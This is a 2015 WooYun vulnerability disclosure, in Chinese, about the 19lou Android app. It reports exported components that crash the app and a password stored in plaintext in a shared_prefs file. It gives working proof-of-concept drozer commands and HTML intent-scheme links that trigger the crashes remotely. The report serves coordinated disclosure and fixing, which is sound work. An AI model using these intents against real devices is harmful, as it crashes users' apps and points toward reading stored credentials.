当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119959

漏洞标题:19楼Android客户端信息泄露以及拒绝服务漏洞(可远程利用)

相关厂商:十九楼

漏洞作者: 路人甲

提交时间:2015-06-12 15:53

修复时间:2015-09-10 16:02

公开时间:2015-09-10 16:02

漏洞类型:拒绝服务

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-12: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向第三方安全合作伙伴开放
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述:

详细说明:

## 1 ##
App版本:v5.4.1
## 2 ## 客户端拒绝服务
以下组件是exported=true,直接调用会导致app没有任何提示就崩溃退出

Activity:
com.tencent.tauth.TAuthView
Broadcast:
com.nineteenlou.statisticssdk.core.LoadData$UpdateReceiver
com.igexin.download.DownloadReceiver


## POC ##
(1)本地利用,drozer

dz> run app.activity.start --component com.nineteenlou.nineteenlou com.tencent.tauth.TAuthView
dz> run app.broadcast.send --component com.nineteenlou.nineteenlou com.nineteenlou.statisticssdk.core.LoadData$UpdateReceiver
dz> run app.broadcast.send --component com.nineteenlou.nineteenlou com.igexin.download.DownloadReceiver


(2)远程利用,IntentScheme

<h1><a href="intent:#Intent;component=com.nineteenlou.nineteenlou/com.tencent.tauth.TAuthView;end">START: com.tencent.tauth.TAuthView</a></h1><br>
<h1><a href="intent:#Intent;component=com.nineteenlou.nineteenlou/com.nineteenlou.statisticssdk.core.LoadData$UpdateReceiver;end">SEND: com.nineteenlou.statisticssdk.core.LoadData$UpdateReceiver</a></h1><br>
<h1><a href="intent:#Intent;component=com.nineteenlou.nineteenlou/com.igexin.download.DownloadReceiver;end">SEND: com.igexin.download.DownloadReceiver</a></h1><br>


2.JPG


## 3 ## 敏感信息泄露
文件路径:/data/data/com.nineteenlou.nineteenlou/shared_prefs/PrefsFile.xml
存在明文密码等信息,如图

1.JPG

漏洞证明:

见详细说明

修复方案:

1. 正确处理异常intent
2. 不要在客户端明文保存密码

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-06-12 16:00

厂商回复:

感谢路人甲。

最新状态:

暂无